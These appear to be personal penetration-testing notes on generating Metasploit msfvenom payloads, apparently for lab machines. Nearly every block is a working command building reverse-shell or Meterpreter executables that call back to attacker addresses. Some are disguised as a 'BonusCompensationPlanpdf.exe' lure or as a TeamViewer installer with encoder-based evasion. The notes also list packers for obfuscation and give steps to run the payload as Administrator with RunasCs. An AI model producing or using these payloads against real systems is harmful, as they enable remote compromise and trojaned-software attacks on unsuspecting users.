[[Payloads Explained]] [[Metasploit]]

```shell
#list all the payloads
msfvenom -l payloads
```

#Staged payloads create a way for us to send over more components of our attack.

#Stageless payloads do not have a stage. This payload will be sent in its entirety across a network connection without a stage.

## Linux

```shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf
```

## Windows

### EXE

```shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe
```

### ASPX

```shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx
```

### Fake TeamViewer

```shell
msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5
```

```shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=PORT -f exe -o s.exe
```

```shell
# start a reverse shell in metasploit
use multi/handler
```

```shell
# load plugins into metasploit
sudo cp ./Metasploit-Plugins/pentest.rb /usr/share/metasploit-framework/plugins/pentest.rb
```

A list of popular packer software:

- [UPX packer](https://upx.github.io)
- [The Enigma Protector](https://enigmaprotector.com)
- [MPRESS](https://www.matcode.com/mpress.htm)
- Alternate EXE Packer
- ExeStealth
- Morphine
- MEW
- Themida

1. Create a shell with msfvenom, replace port `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=PORT -f exe -o s.exe`
2. Download RunasCs and unzip [https://github.com/antonioCoco/RunasCs/r...unasCs.zip](https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip)
3. Transfer s.exe and RunasCs.exe
4. Start multi/handler on port with payload windows/x64/meterpreter/reverse_tcp and host tun0
5. ./RunasCs.exe "Administrator" "password" "s.exe"